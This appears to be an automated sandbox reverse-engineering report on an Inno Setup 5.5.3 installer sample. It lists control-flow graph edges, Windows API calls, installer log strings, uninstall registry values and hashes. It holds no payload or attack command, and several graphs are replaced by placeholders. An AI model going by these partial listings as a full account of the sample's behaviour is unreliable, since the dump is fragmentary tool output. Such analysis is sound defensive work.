51776->51777 51778 46709d 51776->51778 51777->50629 51779 414b18 18 API calls 51778->51779 51780 4670ab 51779->51780 51781 414b18 18 API calls 51780->51781 51781->51777 51789 421a74 51788->51789 51791 421a2a 51788->51791 51789->51771 51790 421a59 51790->51789 51795 421d28 SetFocus GetFocus 51790->51795 51791->51790 51792 408cbc 19 API calls 51791->51792 51792->51790 51794->51766 51795->51789 51844 46c7a5 51843->51844 51845 414ae8 18 API calls 51844->51845 51860 46c7f2 51844->51860 51846 46c7bb 51845->51846 52050 466924 20 API calls 51846->52050 51847 403420 4 API calls 51849 46c89c 51847->51849 51849->50709 52042 408be0 19 API calls 51849->52042 51850 46c7c3 51851 414b18 18 API calls 51850->51851 51852 46c7d1 51851->51852 51853 46c7de 51852->51853 51855 46c7f7 51852->51855 52051 47efd0 56 API calls 51853->52051 51856 46c80f 51855->51856 51858 466a08 CharNextA 51855->51858 52052 47efd0 56 API calls 51856->52052 51859 46c80b 51858->51859 51859->51856 51861 46c825 51859->51861 51860->51847 51862 46c841 51861->51862 51863 46c82b 51861->51863 51865 42c99c CharNextA 51862->51865 52053 47efd0 56 API calls 51863->52053 51866 46c84e 51865->51866 51866->51860 52054 466a94 18 API calls 51866->52054 51868 46c865 51869 451458 18 API calls 51868->51869 51870 46c872 51869->51870 52055 47efd0 56 API calls 51870->52055 51873 4241ed SetActiveWindow 51872->51873 51877 424223 51872->51877 52056 42364c 51873->52056 51877->50721 51877->50722 51878 42420a 51878->51877 51879 42421d SetFocus 51878->51879 51879->51877 51881 482505 51880->51881 51882 4824d7 51880->51882 51884 475bd0 51881->51884 52069 494cec 32 API calls 51882->52069 52070 457d10 51884->52070 52043->50717 52050->51850 52051->51860 52052->51860 52053->51860 52054->51868 52055->51860 52065 4235f8 SystemParametersInfoA 52056->52065 52059 423665 ShowWindow 52061 423670 52059->52061 52062 423677 52059->52062 52068 423628 SystemParametersInfoA 52061->52068 52064 423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 
52062->52064 52064->51878 52066 423616 52065->52066 52066->52059 52067 423628 SystemParametersInfoA 52066->52067 52067->52059 52068->52062 52069->51881 52071 457e44 52070->52071 52072 457d3c 52070->52072 52073 457e95 52071->52073 52546 45757c 20 API calls 52071->52546 52542 457a0c GetSystemTimeAsFileTime FileTimeToSystemTime 52072->52542 52076 403400 4 API calls 52073->52076 52078 457eaa 52076->52078 52077 457d44 52079 4078f4 33 API calls 52077->52079 52091 4072a8 52078->52091 52080 457db5 52079->52080 52543 457d00 34 API calls 52080->52543 52086 457dbd 52092 403738 52091->52092 52093 4072b2 SetCurrentDirectoryA 52092->52093 52542->52077 52543->52086 52546->52073 53743 431eec 53704->53743 53706 43d9f2 53707 403400 4 API calls 53706->53707 53708 43da76 53707->53708 53708->50778 53708->50779 53710 431bd6 53709->53710 53711 402648 18 API calls 53710->53711 53712 431c06 53711->53712 53713 4947f8 53712->53713 53714 4948cd 53713->53714 53715 494812 53713->53715 53720 494910 53714->53720 53715->53714 53717 433d6c 18 API calls 53715->53717 53719 403450 18 API calls 53715->53719 53748 408c0c 18 API calls 53715->53748 53749 431ca0 53715->53749 53717->53715 53719->53715 53721 49492c 53720->53721 53757 433d6c 53721->53757 53723 494931 53724 431ca0 18 API calls 53723->53724 53725 49493c 53724->53725 53726 43d594 53725->53726 53727 43d5c1 53726->53727 53728 43d5b3 53726->53728 53727->50789 53728->53727 53729 43d63d 53728->53729 53733 447084 18 API calls 53728->53733 53736 43d6f7 53729->53736 53760 447084 53729->53760 53731 43d688 53766 43dd50 53731->53766 53733->53728 53734 43d8fd 53734->53727 53786 447024 18 API calls 53734->53786 53736->53734 53737 43d8de 53736->53737 53784 447024 18 API calls 53736->53784 53785 447024 18 API calls 53737->53785 53740->50791 53741->50793 53742->50780 53744 403494 4 API calls 53743->53744 53746 431efb 53744->53746 53745 431f25 53745->53706 53746->53745 53747 403744 18 API calls 53746->53747 53747->53746 53748->53715 53750 431cc0 53749->53750 
control_flow_graph (continuation): basic-block edge list of the preceding function graphs (node ids, block addresses and API-call annotations emitted by the graph widget); the rendered graph is not recoverable from the text.
                                                                                                    Strings
                                                                                                    • Incrementing shared file count (64-bit)., xrefs: 0047158C
                                                                                                    • Stripped read-only attribute., xrefs: 00470EC7
                                                                                                    • Will register the file (a DLL/OCX) later., xrefs: 0047151F
                                                                                                    • Version of existing file: %u.%u.%u.%u, xrefs: 00470B7C
                                                                                                    • Dest file exists., xrefs: 004709BB
                                                                                                    • Version of our file: %u.%u.%u.%u, xrefs: 00470AF0
                                                                                                    • Time stamp of existing file: %s, xrefs: 00470A2B
                                                                                                    • -- File entry --, xrefs: 004706FB
                                                                                                    • Failed to strip read-only attribute., xrefs: 00470ED3
                                                                                                    • Time stamp of our file: (failed to read), xrefs: 004709A7
                                                                                                    • Installing into GAC, xrefs: 00471714
                                                                                                    • Non-default bitness: 32-bit, xrefs: 004708BB
                                                                                                    • Non-default bitness: 64-bit, xrefs: 004708AF
                                                                                                    • Incrementing shared file count (32-bit)., xrefs: 004715A5
                                                                                                    • Existing file is protected by Windows File Protection. Skipping., xrefs: 00470DEC
                                                                                                    • Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 00470CD0
                                                                                                    • Skipping due to "onlyifdestfileexists" flag., xrefs: 00470EFA
                                                                                                    • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 00470CC4
                                                                                                    • @, xrefs: 004707B0
                                                                                                    • Uninstaller requires administrator: %s, xrefs: 0047118F
                                                                                                    • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 00470E96
                                                                                                    • Dest filename: %s, xrefs: 00470894
                                                                                                    • Couldn't read time stamp. Skipping., xrefs: 00470D35
                                                                                                    • Same version. Skipping., xrefs: 00470CE5
                                                                                                    • Will register the file (a type library) later., xrefs: 00471513
                                                                                                    • Time stamp of existing file: (failed to read), xrefs: 00470A37
                                                                                                    • Existing file is a newer version. Skipping., xrefs: 00470C02
                                                                                                    • User opted not to overwrite the existing file. Skipping., xrefs: 00470E4D
                                                                                                    • Existing file has a later time stamp. Skipping., xrefs: 00470DCF
                                                                                                    • Time stamp of our file: %s, xrefs: 0047099B
                                                                                                    • Existing file's SHA-1 hash matches our file. Skipping., xrefs: 00470CB5
                                                                                                    • Dest file is protected by Windows File Protection., xrefs: 004708ED
                                                                                                    • Skipping due to "onlyifdoesntexist" flag., xrefs: 004709CE
                                                                                                    • InUn, xrefs: 0047115F
                                                                                                    • Version of our file: (none), xrefs: 00470AFC
                                                                                                    • Version of existing file: (none), xrefs: 00470CFA
                                                                                                    • .tmp, xrefs: 00470FB7
                                                                                                    • , xrefs: 00470BCF, 00470DA0, 00470E1E
                                                                                                    • Installing the file., xrefs: 00470F09
                                                                                                    • Same time stamp. Skipping., xrefs: 00470D55
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
                                                                                                    • API String ID: 0-4021121268
                                                                                                    • Opcode ID: cebd1a573a13cfb1480ab73f2a07467b13e4d984594641078933206a2f2f5451
                                                                                                    • Instruction ID: 04e5041402f80353ef90c659d92e8d378e84d4fed116f8838aecbbc27e5febe3
                                                                                                    • Opcode Fuzzy Hash: cebd1a573a13cfb1480ab73f2a07467b13e4d984594641078933206a2f2f5451
                                                                                                    • Instruction Fuzzy Hash: 31927574A0424CDFDB21DFA9C445BDDBBB5AF05304F1480ABE848A7392D7789E49CB19

                                                                                                    Control-flow Graph

                                                                                                    control_flow_graph 1578 42e09c-42e0ad 1579 42e0b8-42e0dd AllocateAndInitializeSid 1578->1579 1580 42e0af-42e0b3 1578->1580 1581 42e287-42e28f 1579->1581 1582 42e0e3-42e100 GetVersion 1579->1582 1580->1581 1583 42e102-42e117 GetModuleHandleA GetProcAddress 1582->1583 1584 42e119-42e11b 1582->1584 1583->1584 1585 42e142-42e15c GetCurrentThread OpenThreadToken 1584->1585 1586 42e11d-42e12b CheckTokenMembership 1584->1586 1589 42e193-42e1bb GetTokenInformation 1585->1589 1590 42e15e-42e168 GetLastError 1585->1590 1587 42e131-42e13d 1586->1587 1588 42e269-42e27f FreeSid 1586->1588 1587->1588 1591 42e1d6-42e1fa call 402648 GetTokenInformation 1589->1591 1592 42e1bd-42e1c5 GetLastError 1589->1592 1593 42e174-42e187 GetCurrentProcess OpenProcessToken 1590->1593 1594 42e16a-42e16f call 4031bc 1590->1594 1605 42e208-42e210 1591->1605 1606 42e1fc-42e206 call 4031bc * 2 1591->1606 1592->1591 1595 42e1c7-42e1d1 call 4031bc * 2 1592->1595 1593->1589 1598 42e189-42e18e call 4031bc 1593->1598 1594->1581 1595->1581 1598->1581 1607 42e212-42e213 1605->1607 1608 42e243-42e261 call 402660 CloseHandle 1605->1608 1606->1581 1611 42e215-42e228 EqualSid 1607->1611 1615 42e22a-42e237 1611->1615 1616 42e23f-42e241 1611->1616 1615->1616 1619 42e239-42e23d 1615->1619 1616->1608 1616->1611 1619->1608
                                                                                                    APIs
                                                                                                    • AllocateAndInitializeSid.ADVAPI32(00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0D6
                                                                                                    • GetVersion.KERNEL32(00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0F3
                                                                                                    • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E10C
                                                                                                    • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E112
                                                                                                    • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E127
                                                                                                    • FreeSid.ADVAPI32(00000000,0042E287,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E27A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                                                                    • String ID: CheckTokenMembership$advapi32.dll
                                                                                                    • API String ID: 2252812187-1888249752
                                                                                                    • Opcode ID: a9f409996ddfe82e0213da269ff1de212d34eb3ec341ac20085b7d7d2472ef68
                                                                                                    • Instruction ID: e5677345bf142a8b1d9111380f95962c8bb8cf61ba8e960ca5c3fd0f127139eb
                                                                                                    • Opcode Fuzzy Hash: a9f409996ddfe82e0213da269ff1de212d34eb3ec341ac20085b7d7d2472ef68
                                                                                                    • Instruction Fuzzy Hash: E351A271B44215EEEB10EAE69C42BBF77ACEB09704F9404BBB901F7281D57C99018B79

                                                                                                    Control-flow Graph

                                                                                                    control_flow_graph 1642 4502c0-4502cd 1643 4502d3-4502e0 GetVersion 1642->1643 1644 45037c-450386 1642->1644 1643->1644 1645 4502e6-4502fc LoadLibraryA 1643->1645 1645->1644 1646 4502fe-450377 GetProcAddress * 6 1645->1646 1646->1644
                                                                                                    APIs
                                                                                                    • GetVersion.KERNEL32(00480B52), ref: 004502D3
                                                                                                    • LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480B52), ref: 004502EB
                                                                                                    • GetProcAddress.KERNEL32(6E9E0000,RmStartSession), ref: 00450309
                                                                                                    • GetProcAddress.KERNEL32(6E9E0000,RmRegisterResources), ref: 0045031E
                                                                                                    • GetProcAddress.KERNEL32(6E9E0000,RmGetList), ref: 00450333
                                                                                                    • GetProcAddress.KERNEL32(6E9E0000,RmShutdown), ref: 00450348
                                                                                                    • GetProcAddress.KERNEL32(6E9E0000,RmRestart), ref: 0045035D
                                                                                                    • GetProcAddress.KERNEL32(6E9E0000,RmEndSession), ref: 00450372
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoadVersion
                                                                                                    • String ID: RmEndSession$RmGetList$RmRegisterResources$RmRestart$RmShutdown$RmStartSession$Rstrtmgr.dll
                                                                                                    • API String ID: 1968650500-3419246398
                                                                                                    • Opcode ID: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
                                                                                                    • Instruction ID: c77cef2ad5653e61b65a4477cbb73d0d56cf7b8a9d174f96be3e9b6947252677
                                                                                                    • Opcode Fuzzy Hash: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
                                                                                                    • Instruction Fuzzy Hash: B211F7B4510301DBD710FB61BF45A2E36E9E728315B08063FE804961A2CB7C4844CF8C
                                                                                                    Control-flow Graph
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 22958418fcb5307417e2cb8c5b21c835fdc4d5c2778e3f26f52eb9817f6a2da5
                                                                                                    • Instruction ID: afb4f91cf4018cf9acc1c9974f14325182323c15c0e0405bd0f9b005e596376e
                                                                                                    • Opcode Fuzzy Hash: 22958418fcb5307417e2cb8c5b21c835fdc4d5c2778e3f26f52eb9817f6a2da5
                                                                                                    • Instruction Fuzzy Hash: 03E1AE31700124EFDB04DF69E989AADB7B5FB54300FA440AAE5559B352C73CEE81DB09
                                                                                                    Control-flow Graph
                                                                                                    APIs
                                                                                                      • Part of subcall function 004958CC: GetWindowRect.USER32(00000000), ref: 004958E2
                                                                                                    • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00467773
                                                                                                      • Part of subcall function 0041D6B0: GetObjectA.GDI32(?,00000018,0046778D), ref: 0041D6DB
                                                                                                      • Part of subcall function 00467180: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467223
                                                                                                      • Part of subcall function 00467180: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467249
                                                                                                      • Part of subcall function 00467180: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004672A0
                                                                                                      • Part of subcall function 00466B40: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467828,00000000,00000000,00000000,0000000C,00000000), ref: 00466B58
                                                                                                      • Part of subcall function 00495B50: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 00495B5A
                                                                                                      • Part of subcall function 0042ED38: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
                                                                                                      • Part of subcall function 0042ED38: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
                                                                                                      • Part of subcall function 0049581C: GetDC.USER32(00000000), ref: 0049583E
                                                                                                      • Part of subcall function 0049581C: SelectObject.GDI32(?,00000000), ref: 00495864
                                                                                                      • Part of subcall function 0049581C: ReleaseDC.USER32(00000000,?), ref: 004958B5
                                                                                                      • Part of subcall function 00495B40: MulDiv.KERNEL32(0000004B,?,00000006), ref: 00495B4A
                                                                                                    • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,0212FBC8,02131928,?,?,02131958,?,?,021319A8,?), ref: 004683FD
                                                                                                    • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 0046840E
                                                                                                    • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00468426
                                                                                                      • Part of subcall function 0042A05C: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A072
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$AppendExtractIconObject$AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectReleaseSelectSendSystemUserWindow
                                                                                                    • String ID: $(Default)$STOPIMAGE$%H
                                                                                                    • API String ID: 3231140908-2624782221
                                                                                                    • Opcode ID: cd61aa661d0cbe35304877807cea77ca0702e96d718fc27b010991c92e86a780
                                                                                                    • Instruction ID: 1a3196d4b4984e68f3522cc8585b165e0004af585c118fa25862355e2bbb38c0
                                                                                                    • Opcode Fuzzy Hash: cd61aa661d0cbe35304877807cea77ca0702e96d718fc27b010991c92e86a780
                                                                                                    • Instruction Fuzzy Hash: 95F2C6346005248FCB00EF69D9D9F9973F1BF49304F1582BAE5049B36ADB74AC46CB9A
                                                                                                    APIs
                                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 00474FE1
                                                                                                    • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 004750BE
                                                                                                    • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 004750CC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$File$CloseFirstNext
                                                                                                    • String ID: unins$unins???.*
                                                                                                    • API String ID: 3541575487-1009660736
                                                                                                    • Opcode ID: 490a2bf6f62b777b12f8bb075fd261ec892e44da2a65e6c72c5e66397d3a6b60
                                                                                                    • Instruction ID: 191fa049ef1442540897bd6b232d6b1da598bf4afdbbee48782243349675ce5a
                                                                                                    • Opcode Fuzzy Hash: 490a2bf6f62b777b12f8bb075fd261ec892e44da2a65e6c72c5e66397d3a6b60
                                                                                                    • Instruction Fuzzy Hash: 95315074A00548ABCB10EB65CD81BDEB7A9DF45304F50C0B6E40CAB3A2DB789F418B59
                                                                                                    APIs
                                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452A9D
                                                                                                    • GetLastError.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452AA5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileFindFirstLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 873889042-0
                                                                                                    • Opcode ID: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
                                                                                                    • Instruction ID: 3e58272229af866f17ac5928e9872a720c3be2d4903e778e839a846eb7d55d53
                                                                                                    • Opcode Fuzzy Hash: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
                                                                                                    • Instruction Fuzzy Hash: 94F0F971A04604AB8B10EF669D4149EF7ACEB8672571046BBFC14E3282DAB84E0485A8
APIs
• GetVersion.KERNEL32(?,0046E17A), ref: 0046E0EE
• CoCreateInstance.OLE32(00499B98,00000000,00000001,00499BA8,?,?,0046E17A), ref: 0046E10A
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CreateInstanceVersion
• String ID:
• API String ID: 1462612201-0
APIs
• GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
APIs
• NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424151,?,00000000,0042415C), ref: 00423BAE
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: NtdllProc_Window
• String ID:
• API String ID: 4255912815-0
APIs
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: NameUser
• String ID:
• API String ID: 2645101109-0
APIs
• NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F53C
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: NtdllProc_Window
• String ID:
• API String ID: 4255912815-0

Control-flow Graph

Graph for the function at 46f058 not reproduced (original legend: Executed / Not Executed). API call on its nodes: RegCloseKey.
APIs
  • Part of subcall function 0046EE44: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,0047620E,?,0049C1E0,?,0046F15B,?,00000000,0046F6F6,?,_is1), ref: 0046EE67
  • Part of subcall function 0046EEB4: RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F532,?,?,00000000,0046F6F6,?,_is1,?), ref: 0046EEC7
• RegCloseKey.ADVAPI32(?,0046F6FD,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046F748,?,?,0049C1E0,00000000), ref: 0046F6F0
Strings
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Value$Close
• String ID: " /SILENT$5.5.3 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
• API String ID: 3391052094-3342197833

Control-flow Graph

Graph for the function at 492848 not reproduced (original legend: Executed / Not Executed). API calls on its nodes: Sleep, FindWindowA, SendMessageA, PostMessageA, SendNotifyMessageA, RegisterClipboardFormatA, GetProcAddress, GetLastError, FreeLibrary, CreateMutexA, OemToCharBuffA, CharToOemBuffA.
APIs
• Sleep.KERNEL32(00000000,00000000,00492D3D,?,?,?,?,00000000,00000000,00000000), ref: 00492888
• FindWindowA.USER32(00000000,00000000), ref: 004928B9
Strings
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FindSleepWindow
• String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
• API String ID: 3078808852-3310373309

Control-flow Graph

